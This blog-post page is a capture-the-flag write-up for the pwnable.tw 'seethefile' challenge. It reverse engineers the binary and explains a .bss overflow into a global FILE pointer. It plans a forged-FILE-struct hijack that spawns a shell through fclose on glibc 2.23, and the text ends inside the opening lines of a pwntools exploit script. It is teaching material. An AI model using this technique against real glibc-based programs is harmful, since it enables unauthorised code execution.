<!DOCTYPE html>
<html lang="en-us"><head>
  <meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Pwnable.tw - Seethefile | Intranautic</title>
<meta property="og:title" content="Pwnable.tw - Seethefile | Intranautic" />
<meta name="twitter:title" content="Pwnable.tw - Seethefile | Intranautic" />
<meta itemprop="name" content="Pwnable.tw - Seethefile | Intranautic" />
<meta name="application-name" content="Pwnable.tw - Seethefile | Intranautic" />
<meta property="og:site_name" content="My blog" />

<meta name="description" content="">
<meta itemprop="description" content="" />
<meta property="og:description" content="" />
<meta name="twitter:description" content="" />

<meta property="og:locale" content="en-us" />
<meta name="language" content="en-us" />



  <meta itemprop="image" content="https://intranautic.com/" />
  <meta property="og:image" content="https://intranautic.com/" />
  <meta name="twitter:image" content="https://intranautic.com/" />
  <meta name="twitter:image:src" content="https://intranautic.com/" />




    
    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2023-03-15T00:00:00Z />
    <meta property="article:published_time" content=2023-03-15T00:00:00Z />

    
    <meta property="og:article:author" content="Intranautic" />
    <meta property="article:author" content="Intranautic" />
    <meta name="author" content="Intranautic" />
    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "Pwnable.tw - Seethefile",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2023-03-15",
        "description": "",
        "wordCount":  1592 ,
        "mainEntityOfPage": "True",
        "dateModified": "2023-03-15",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "Intranautic"
        }
    }
    </script>

  <meta name="generator" content="Hugo 0.110.0">

  

  <link rel="canonical" href="https://intranautic.com/posts/pwnabletw-seethefile/"><link href="/sass/main.min.e1a241912604fa0730aca01728f78b04c1144d447dd693df07a461d5f7a63544.css" rel="stylesheet"><link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

  

  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon/favicon-16x16.png">
  <link rel="manifest" href="/images/favicon/site.webmanifest">
  <link rel="mask-icon" href="/images/favicon/safari-pinned-tab.svg" color="#5bbad5">
  <link rel="shortcut icon" href="/images/favicon/favicon.ico">
  <meta name="msapplication-TileColor" content="#2b5797">
  <meta name="msapplication-config" content="/images/favicon/browserconfig.xml">
  <meta name="theme-color" content="#ffffff">

  
  <link rel="icon" type="image/svg+xml" href="/images/favicon/favicon.svg">

  
    </head><body data-theme = "dark" class="notransition">
<script src="https://intranautic.com/js/themeLoader.min.4e9e1a253d543bbfec02e7f2460d9621e719fd739dc8a5256faa91cda6e12e03.js"></script><div class="navbar" role="navigation">
  <nav class="menu" aria-label="Main Navigation">
    <a href="/" class="logo">
      <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title>Home</title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
    </a>
    <input type="checkbox" id="menu-trigger" class="menu-trigger" />
    <label for="menu-trigger">
      <span class="menu-icon">
        <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
      </span>
    </label>

    <div class="trigger">
      <ul class="trigger-container">
        
        
          <li>
            <a 
            class="menu-link "
            href="/">
            Home
            </a>
            
          </li>
        
          <li>
            <a 
            class="menu-link active"
            href="/posts/">
            Posts
            </a>
            
          </li>
        
          <li>
            <a 
            class="menu-link "
            href="/about/">
            About
            </a>
            
          </li>
        
        <li class="menu-separator">
          <span>|</span>
        </li>
      </ul>
      <a id="mode" href="#">
        <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
        <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
      </a>
    </div>
  </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Pwnable.tw - Seethefile</h1>
                
                <div class="post-meta">
                    <time datetime="2023-03-15T00:00:00&#43;00:00" itemprop="datePublished"> Mar 15, 2023 </time>
                </div>
            </header>
            <div class="page-content">
                <blockquote>
<p>seethefile [250 pts]</p>
<p>Can you see anything?</p>
<p>Get a shell for me.</p>
<p><a href="https://pwnable.tw/static/chall/seethefile">seethefile</a>
<a href="https://pwnable.tw/static/libc/libc_32.so.6">libc.so.6</a></p>
</blockquote>
<p>This challenge relies on a technique known as FILE structure exploitation. I will
not be covering the topic within this post, so I would recommend a read through
my post on <a href="/posts/file-struct-pwn/">FILE structure exploitation</a>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nl">Arch:</span>     <span class="nf">i386</span><span class="o">-</span><span class="mi">32</span><span class="o">-</span><span class="nv">little</span>
</span></span><span class="line"><span class="cl"><span class="nl">RELRO:</span>    <span class="nf">Partial</span> <span class="nv">RELRO</span>
</span></span><span class="line"><span class="cl"><span class="nl">Stack:</span>    <span class="nf">No</span> <span class="nv">canary</span> <span class="nv">found</span>
</span></span><span class="line"><span class="cl"><span class="nl">NX:</span>       <span class="nf">NX</span> <span class="nv">enabled</span>
</span></span><span class="line"><span class="cl"><span class="nl">PIE:</span>      <span class="nf">No</span> <span class="nv">PIE</span> <span class="p">(</span><span class="mh">0x8048000</span><span class="p">)</span>
</span></span></code></pre></div><p>We can see that there are no memory corruption mitigations enabled that seem out
of the ordinary. Something that we can notice is the fact that this is a 32 bit
binary.</p>
<p>By running the binary we are prompted with the following menu.</p>
<pre tabindex="0"><code>#######################################################
   This is a simple program to open,read,write a file
   You can open what you want to see
   Can you read everything ?
#######################################################
---------------MENU---------------
  1. Open
  2. Read
  3. Write to screen
  4. Close
  5. Exit
----------------------------------
Your choice :
</code></pre><p>We can see that we are given the option to either open, read, write (to stdout) and
close a file. Lets take a closer look into the internal implementation of the binary
and see if there are any obvious vulnerabilities.</p>
<p><img src="/assets/img/file-struct-pwn-0.png" alt="file-struct-pwn-0"></p>
<p>We can see that the first functions which are called are init and welcome. We can
deduce that these will perform some initialization and write the welcome message to
standard output for us.</p>
<p>From there, it will read our input into a local stack buffer via scanf. It will then
convert our input buffer into an integer and will handle the logic for the menu.</p>
<p>The first vulnerability we can see here is the fact that we actually have a simple
stack based buffer overflow here, as the scanf allows us to read an unlimited amount
of bytes.</p>
<p>However, it is not exploitable due to the fact that it sanitizes our input to ensure
that it is less than the value 5. Even if we overflow this stack buffer, we cannot
return as it will utilize exit to terminate the process.</p>
<p>Another interesting section of code comes directly after, in which we are told to
leave our name. Again there is another buffer overflow, however this one occurs on
a global buffer in .bss.</p>
<p>Remember this vulnerability, as it is an essential primitive to exploiting this
binary. Lets dive into the openfile function and see what functionality is available
to us.</p>
<p><img src="/assets/img/file-struct-pwn-1.png" alt="file-struct-pwn-1"></p>
<p>We can see at first glance that it will first check the fp variable, which is a global
FILE pointer. With this, we know that we can only have a single file open at a time
within our program.</p>
<p>It then zeroes out another global buffer stored within the .bss section named magicbuf,
which will store the contents of the file we want to open and read. It will then prompt
us to input the path of the file we want to open. There is no buffer overflow in this
function, as it will only allow us to read 63 bytes via scanf.</p>
<p>Next, we can see that it will explicitly check if the string &ldquo;flag&rdquo; is present within
our input so we are unable to cheese the challenge.</p>
<p>If all is well, then we will proceed to open the file and return the result. Next
lets take a look at the readfile function.</p>
<p><img src="/assets/img/file-struct-pwn-2.png" alt="file-struct-pwn-2.png"></p>
<p>First, the function will zero out the magicbuf buffer, then will read 399 bytes into
the 400 byte buffer. There are no vulnerabilities within this function, so we can
move onto the next.</p>
<p><img src="/assets/img/file-struct-pwn-3.png" alt="file-struct-pwn-3.png"></p>
<p>This function also performs a very simple functionality, it will simply check if the
file currently opened is the flag. If all conditions are satisfied, then it will print
the contents of magicbuf.</p>
<p><img src="/assets/img/file-struct-pwn-4.png" alt="file-struct-pwn-4.png"></p>
<p>The functionality for closefile is also simple. It will simply check the global file
pointer, and will close the FILE if it isn&rsquo;t null.</p>
<p>By opening the path /proc/self/maps, we can view the entire virtual address space of
our process. With this we can essentially get an information leak into every single
important structure within memory. We will use this to gain the address of libc.</p>
<p>Going back to the first buffer overflow vulnerability within main, lets attempt to
trigger it to see how we can exploit it. If we exit and leave our name, we can gain
a segmentation fault.</p>
<pre tabindex="0"><code>#######################################################
   This is a simple program to open,read,write a file
   You can open what you want to see
   Can you read everything ?
#######################################################
---------------MENU---------------
  1. Open
  2. Read
  3. Write to screen
  4. Close
  5. Exit
----------------------------------
Your choice :5
Leave your name :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Thank you AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ,see you next time
[1]    8542 segmentation fault (core dumped)  ./seethefile
</code></pre><p>If we investigate this segmentation fault via gdb, we notice that the actual pointer
which is being passed to fclose has been overwritten by our buffer overflow.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">Program</span> <span class="nv">received</span> <span class="nb">si</span><span class="nv">gnal</span> <span class="nb">SIGS</span><span class="nv">EGV</span><span class="p">,</span> <span class="ow">Seg</span><span class="nv">mentation</span> <span class="nv">fault.</span>
</span></span><span class="line"><span class="cl"><span class="err">0</span><span class="nf">xf7dcdfbb</span> <span class="nv">in</span> <span class="nv">_IO_new_fclose</span> <span class="p">(</span><span class="nv">fp</span><span class="err">=</span><span class="mh">0x41414141</span><span class="p">)</span> <span class="nv">at</span> <span class="nv">iofclose.c</span><span class="p">:</span><span class="mi">43</span>
</span></span><span class="line"><span class="cl"><span class="err">43</span>        <span class="nf">if</span> <span class="p">(</span><span class="nv">_IO_vtable_offset</span> <span class="p">(</span><span class="nv">fp</span><span class="p">)</span> <span class="err">!=</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="err">[</span> <span class="nl">Legend:</span> <span class="nf">Modified</span> <span class="nv">register</span> <span class="o">|</span> <span class="nv">Code</span> <span class="o">|</span> <span class="nv">Heap</span> <span class="o">|</span> <span class="nv">Stack</span> <span class="o">|</span> <span class="nv">String</span> <span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="err">────────────────────────────────────────────────────────────</span> <span class="nf">registers</span> <span class="err">────</span>
</span></span><span class="line"><span class="cl"><span class="nf">$eax</span>   <span class="p">:</span> <span class="mh">0x41414141</span> <span class="p">(</span><span class="s">&#34;AAAA&#34;</span><span class="nv">?</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="nf">$ebx</span>   <span class="p">:</span> <span class="mh">0xf7f7fe34</span>  <span class="err">→</span>  <span class="mh">0x0021fd4c</span>
</span></span><span class="line"><span class="cl"><span class="nf">$ecx</span>   <span class="p">:</span> <span class="mh">0x0</span>
</span></span><span class="line"><span class="cl"><span class="nf">$edx</span>   <span class="p">:</span> <span class="mh">0x0</span>
</span></span><span class="line"><span class="cl"><span class="nf">$esp</span>   <span class="p">:</span> <span class="mh">0xffffce00</span>  <span class="err">→</span>  <span class="mh">0x08048b40</span>  <span class="err">→</span>  <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">0</span><span class="o">&gt;</span> <span class="nv">push</span> <span class="nb">ebp</span>
</span></span><span class="line"><span class="cl"><span class="nf">$ebp</span>   <span class="p">:</span> <span class="mh">0xffffce28</span>  <span class="err">→</span>  <span class="mh">0xffffce78</span>  <span class="err">→</span>  <span class="mh">0x00000000</span>
</span></span><span class="line"><span class="cl"><span class="nf">$esi</span>   <span class="p">:</span> <span class="mh">0x41414141</span> <span class="p">(</span><span class="s">&#34;AAAA&#34;</span><span class="nv">?</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="nf">$edi</span>   <span class="p">:</span> <span class="mh">0xf7f7fe34</span>  <span class="err">→</span>  <span class="mh">0x0021fd4c</span>
</span></span><span class="line"><span class="cl"><span class="nf">$eip</span>   <span class="p">:</span> <span class="mh">0xf7dcdfbb</span>  <span class="err">→</span>  <span class="o">&lt;</span><span class="nv">fclose</span><span class="o">+</span><span class="mi">27</span><span class="o">&gt;</span> <span class="nv">cmp</span> <span class="kt">BYTE</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0x46</span><span class="p">],</span> <span class="mh">0x0</span>
</span></span><span class="line"><span class="cl"><span class="nl">$cs:</span> <span class="err">0</span><span class="nf">x23</span> <span class="kc">$</span><span class="nb">ss</span><span class="p">:</span> <span class="mh">0x2b</span> <span class="kc">$</span><span class="nb">ds</span><span class="p">:</span> <span class="mh">0x2b</span> <span class="kc">$</span><span class="nb">es</span><span class="p">:</span> <span class="mh">0x2b</span> <span class="kc">$</span><span class="nb">fs</span><span class="p">:</span> <span class="mh">0x00</span> <span class="kc">$</span><span class="nb">gs</span><span class="p">:</span> <span class="mh">0x63</span>
</span></span><span class="line"><span class="cl"><span class="err">────────────────────────────────────────────────────────────────</span> <span class="nf">stack</span> <span class="err">────</span>
</span></span><span class="line"><span class="cl"><span class="err">0</span><span class="nf">xffffce00</span><span class="err">│</span><span class="o">+</span><span class="mh">0x0000</span><span class="p">:</span> <span class="mh">0x08048b40</span>  <span class="err">→</span>  <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">0</span><span class="o">&gt;</span> <span class="nv">push</span> <span class="nb">ebp</span>  <span class="err">←</span> <span class="kc">$</span><span class="nb">esp</span>
</span></span><span class="line"><span class="cl"><span class="err">0</span><span class="nf">xffffce04</span><span class="err">│</span><span class="o">+</span><span class="mh">0x0004</span><span class="p">:</span> <span class="mh">0xf7f7fe34</span>  <span class="err">→</span>  <span class="mh">0x0021fd4c</span>
</span></span><span class="line"><span class="cl"><span class="err">0</span><span class="nf">xffffce08</span><span class="err">│</span><span class="o">+</span><span class="mh">0x0008</span><span class="p">:</span> <span class="mh">0x08048b40</span>  <span class="err">→</span>  <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">0</span><span class="o">&gt;</span> <span class="nv">push</span> <span class="nb">ebp</span>
</span></span><span class="line"><span class="cl"><span class="err">0</span><span class="nf">xffffce0c</span><span class="err">│</span><span class="o">+</span><span class="mh">0x000c</span><span class="p">:</span> <span class="mh">0xf7ffcb80</span>  <span class="err">→</span>  <span class="mh">0x00000000</span>
</span></span><span class="line"><span class="cl"><span class="err">0</span><span class="nf">xffffce10</span><span class="err">│</span><span class="o">+</span><span class="mh">0x0010</span><span class="p">:</span> <span class="mh">0xffffce78</span>  <span class="err">→</span>  <span class="mh">0x00000000</span>
</span></span><span class="line"><span class="cl"><span class="err">0</span><span class="nf">xffffce14</span><span class="err">│</span><span class="o">+</span><span class="mh">0x0014</span><span class="p">:</span> <span class="mh">0xf7fdb324</span>  <span class="err">→</span>  <span class="o">&lt;</span><span class="nv">_dl_runtime_resolve</span><span class="o">+</span><span class="mi">20</span><span class="o">&gt;</span> <span class="nv">pop</span> <span class="nb">edx</span>
</span></span><span class="line"><span class="cl"><span class="err">0</span><span class="nf">xffffce18</span><span class="err">│</span><span class="o">+</span><span class="mh">0x0018</span><span class="p">:</span> <span class="mh">0x00000000</span>
</span></span><span class="line"><span class="cl"><span class="err">0</span><span class="nf">xffffce1c</span><span class="err">│</span><span class="o">+</span><span class="mh">0x001c</span><span class="p">:</span> <span class="mh">0xf7f7fe34</span>  <span class="err">→</span>  <span class="mh">0x0021fd4c</span>
</span></span><span class="line"><span class="cl"><span class="err">──────────────────────────────────────────────────────────</span> <span class="nl">code:x86:</span><span class="err">32</span> <span class="err">────</span>
</span></span><span class="line"><span class="cl">   <span class="err">0</span><span class="nf">xf7dcdfb4</span> <span class="o">&lt;</span><span class="nv">fclose</span><span class="o">+</span><span class="mi">20</span><span class="o">&gt;</span>      <span class="nv">push</span>   <span class="nb">ebx</span>
</span></span><span class="line"><span class="cl">   <span class="err">0</span><span class="nf">xf7dcdfb5</span> <span class="o">&lt;</span><span class="nv">fclose</span><span class="o">+</span><span class="mi">21</span><span class="o">&gt;</span>      <span class="nv">sub</span>    <span class="nb">esp</span><span class="p">,</span> <span class="mh">0x1c</span>
</span></span><span class="line"><span class="cl">   <span class="err">0</span><span class="nf">xf7dcdfb8</span> <span class="o">&lt;</span><span class="nv">fclose</span><span class="o">+</span><span class="mi">24</span><span class="o">&gt;</span>      <span class="nv">mov</span>    <span class="nb">esi</span><span class="p">,</span> <span class="kt">DWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nb">ebp</span><span class="o">+</span><span class="mh">0x8</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"> <span class="err">→</span> <span class="err">0</span><span class="nf">xf7dcdfbb</span> <span class="o">&lt;</span><span class="nv">fclose</span><span class="o">+</span><span class="mi">27</span><span class="o">&gt;</span>      <span class="nv">cmp</span>    <span class="kt">BYTE</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0x46</span><span class="p">],</span> <span class="mh">0x0</span>
</span></span><span class="line"><span class="cl">   <span class="err">0</span><span class="nf">xf7dcdfbf</span> <span class="o">&lt;</span><span class="nv">fclose</span><span class="o">+</span><span class="mi">31</span><span class="o">&gt;</span>      <span class="nv">jne</span>    <span class="mh">0xf7dce1c0</span> <span class="o">&lt;</span><span class="nv">_IO_new_fclose</span><span class="o">+</span><span class="mi">544</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl">   <span class="err">0</span><span class="nf">xf7dcdfc5</span> <span class="o">&lt;</span><span class="nv">fclose</span><span class="o">+</span><span class="mi">37</span><span class="o">&gt;</span>      <span class="nv">mov</span>    <span class="nb">ebx</span><span class="p">,</span> <span class="kt">DWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nb">esi</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">   <span class="err">0</span><span class="nf">xf7dcdfc7</span> <span class="o">&lt;</span><span class="nv">fclose</span><span class="o">+</span><span class="mi">39</span><span class="o">&gt;</span>      <span class="nv">test</span>   <span class="nb">bh</span><span class="p">,</span> <span class="mh">0x20</span>
</span></span><span class="line"><span class="cl">   <span class="err">0</span><span class="nf">xf7dcdfca</span> <span class="o">&lt;</span><span class="nv">fclose</span><span class="o">+</span><span class="mi">42</span><span class="o">&gt;</span>      <span class="nv">jne</span>    <span class="mh">0xf7dce080</span> <span class="o">&lt;</span><span class="nv">_IO_new_fclose</span><span class="o">+</span><span class="mi">224</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl">   <span class="err">0</span><span class="nf">xf7dcdfd0</span> <span class="o">&lt;</span><span class="nv">fclose</span><span class="o">+</span><span class="mi">48</span><span class="o">&gt;</span>      <span class="nv">test</span>   <span class="nb">bh</span><span class="p">,</span> <span class="mh">0x80</span>
</span></span><span class="line"><span class="cl"><span class="err">──────────────────────────────────────────────────</span> <span class="nl">source:</span><span class="nf">iofclose.c</span><span class="o">+</span><span class="mi">43</span> <span class="err">────</span>
</span></span><span class="line"><span class="cl">     <span class="err">38</span>
</span></span><span class="line"><span class="cl">     <span class="err">39</span>  <span class="err">#</span><span class="nf">if</span> <span class="nv">SHLIB_COMPAT</span> <span class="p">(</span><span class="nv">libc</span><span class="p">,</span> <span class="nv">GLIBC_2_0</span><span class="p">,</span> <span class="nv">GLIBC_2_1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">     <span class="err">40</span>    <span class="err">/*</span> <span class="nf">We</span> <span class="nv">desperately</span> <span class="nv">try</span> <span class="nv">to</span> <span class="nv">help</span> <span class="nv">programs</span> <span class="nv">which</span> <span class="nv">are</span> <span class="nv">using</span> <span class="nv">streams</span> <span class="nv">in</span> <span class="nv">a</span>
</span></span><span class="line"><span class="cl">     <span class="err">41</span>       <span class="nf">strange</span> <span class="nv">way</span> <span class="nv">and</span> <span class="nv">mix</span> <span class="nv">old</span> <span class="nv">and</span> <span class="nv">new</span> <span class="nv">functions.</span>  <span class="nv">Detect</span> <span class="nv">old</span> <span class="nv">streams</span>
</span></span><span class="line"><span class="cl">     <span class="err">42</span>       <span class="nf">here.</span>  <span class="o">*/</span>
</span></span><span class="line"><span class="cl">           <span class="err">//</span> <span class="nf">fp</span><span class="err">=</span><span class="mh">0xffffce30</span>  <span class="err">→</span>  <span class="mh">0x41414141</span>
</span></span><span class="line"><span class="cl"> <span class="err">→</span>   <span class="err">43</span>    <span class="nf">if</span> <span class="p">(</span><span class="nv">_IO_vtable_offset</span> <span class="p">(</span><span class="nv">fp</span><span class="p">)</span> <span class="err">!=</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">     <span class="err">44</span>      <span class="nf">return</span> <span class="nv">_IO_old_fclose</span> <span class="p">(</span><span class="nv">fp</span><span class="p">)</span><span class="c1">;</span>
</span></span><span class="line"><span class="cl">     <span class="err">45</span>  <span class="err">#</span><span class="nf">endif</span>
</span></span><span class="line"><span class="cl">     <span class="err">46</span>
</span></span><span class="line"><span class="cl">     <span class="err">47</span>    <span class="err">/*</span> <span class="nf">First</span> <span class="nv">unlink</span> <span class="nv">the</span> <span class="nv">stream.</span>  <span class="o">*/</span>
</span></span><span class="line"><span class="cl">     <span class="err">48</span>    <span class="nf">if</span> <span class="p">(</span><span class="nv">fp</span><span class="o">-&gt;</span><span class="nv">_flags</span> <span class="o">&amp;</span> <span class="nv">_IO_IS_FILEBUF</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="err">──────────────────────────────────────────────────────────────</span> <span class="nf">threads</span> <span class="err">────</span>
</span></span><span class="line"><span class="cl"><span class="err">[#0]</span> <span class="nf">Id</span> <span class="mi">1</span><span class="p">,</span> <span class="nv">Name</span><span class="p">:</span> <span class="s">&#34;a&#34;</span><span class="p">,</span> <span class="nv">stopped</span> <span class="mh">0xf7dcdfbb</span> <span class="nv">in</span> <span class="nv">_IO_new_fclose</span> <span class="p">(),</span> <span class="nv">reason</span><span class="p">:</span> <span class="nb">SIGS</span><span class="nv">EGV</span>
</span></span><span class="line"><span class="cl"><span class="err">────────────────────────────────────────────────────────────────</span> <span class="nf">trace</span> <span class="err">────</span>
</span></span><span class="line"><span class="cl"><span class="err">[#0]</span> <span class="err">0</span><span class="nf">xf7dcdfbb</span> <span class="err">→</span> <span class="nv">_IO_new_fclose</span><span class="p">(</span><span class="nv">fp</span><span class="err">=</span><span class="mh">0x41414141</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="err">[#1]</span> <span class="err">0</span><span class="nf">x8048b14</span> <span class="err">→</span> <span class="nv">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="err">───────────────────────────────────────────────────────────────────────────</span>
</span></span><span class="line"><span class="cl"><span class="nf">gef</span><span class="err">➤</span>
</span></span></code></pre></div><p>If we investigate the buffer we are overflowing closer we notice that we overwrite
the global fp pointer. We can see that the global fp is directly after our name
buffer within the .bss section.</p>
<p><img src="/assets/img/file-struct-pwn-5.png" alt="file-struct-pwn-5.png"></p>
<p>If you are familiar with FILE structure exploitation, then this should sound very
familiar to you. We can construct a malicious FILE structure within memory and
overwrite the fp pointer. Once this fake FILE struct is passed to fclose, we can
pop a shell.</p>
<p>I have a complete post detailing the internals of the FILE structure as well as the
various exploitation techniques that have been discovered over the years, so I will
not be explaining it in this post.</p>
<p>However, we can see that this is glibc 2.23, meaning that the virtual table does not
have the check implemented yet. This means that we can construct and forge a fake
FILE structure within memory to hijack program control.</p>
<p>The first section of our payload will be 32 bytes of padding until we are able
to reach the global FILE pointer. We will overwrite the address of the global
FILE pointer fp with the address directly after the global variable 0x804b284.</p>
<p>We can construct the malicious FILE structure immediately after overwriting the
global FILE pointer. When the virtual table function is called, the address of
the FILE structure will be passed as the parameter. So we fill the first 8 bytes
of the fake FILE structure with the binary we want to execute, in this case
&lsquo;/bin/sh\x00&rsquo;.</p>
<p>The other important fields which we have to fill is the _lock variable and the
vtable, which should contain the address of the virtual table. In this case, we
can populate the address of the lock with any address which dereferences to zero
consistently, as we dont want to accidentally lock our process.</p>
<p>The full exploit code is down below.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="cl"><span class="ch">#!/usr/bin/env python3</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="n">argv</span>
</span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;i386&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">binary</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;seethefile&#39;</span><span class="p">,</span> <span class="n">checksec</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;libc_32.so.6&#39;</span><span class="p">,</span> <span class="n">checksec</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">argv</span><span class="p">)</span> <span class="o">&gt;=</span> <span class="mi">2</span> <span class="ow">and</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;-r&#39;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">  <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;chall.pwnable.tw&#39;</span><span class="p">,</span> <span class="mi">10200</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">  <span class="n">p</span> <span class="o">=</span> <span class="n">binary</span><span class="o">.</span><span class="n">process</span><span class="p">(</span><span class="n">env</span><span class="o">=</span><span class="p">{</span><span class="s1">&#39;LD_PRELOAD&#39;</span><span class="p">:</span> <span class="s1">&#39;libc_32.so.6&#39;</span><span class="p">})</span>
